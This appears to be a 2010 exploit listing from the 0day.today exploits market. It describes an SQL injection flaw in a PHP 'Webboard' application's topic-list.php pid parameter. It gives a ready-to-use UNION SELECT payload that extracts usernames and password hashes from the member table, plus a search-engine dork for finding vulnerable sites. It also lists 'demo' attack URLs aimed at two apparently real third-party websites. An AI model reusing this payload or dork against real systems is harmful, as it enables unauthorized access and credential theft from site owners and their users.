[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webboard (topic-list.php?pid=) SQL Injection Vulnerability

Author
Cr4cK3R-LuL!
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14627
Category
web applications
Date add
31-10-2010
Platform
php
==========================================================
Webboard (topic-list.php?pid=) SQL Injection Vulnerability
==========================================================

#[+] Discovered By   : Cr4cK3R-LuL!
#[+] Date            : 29 October 2010
#[+] Support e-mail  : ahz-c.luli@hotmail.com 
#[+] Dork            : inurl:"webboard/topic-list.php?pid="
#[+]========================================================================

#[+] Exploit:

             -2+union+all+select+concat(username,0x3a,password)+from+member--



#[+] SqlI:

          http://localhost/webboard/topic-list.php?pid=-2+union+all+select+concat(username,0x3a,password)+from+member--
    


#[+] Demo: 

          http://www.pyramidtennis.com/webboard/topic-list.php?pid=-2+union+all+select+concat(username,0x3a,password)+from+member--
          
          http://www.thawornwat.com/webboard/topic-list.php?pid=-1+union+all+select+concat(username,0x3a,password)+from+member--

Password is encrypted by MySQL hashes
#[+]=========================================================================
#[+] Greetz To: Game Over a.k.a dj_c0br4 / Albanian Hackerz Zone
#[+]=========================================================================



#  0day.today [2024-12-22]  #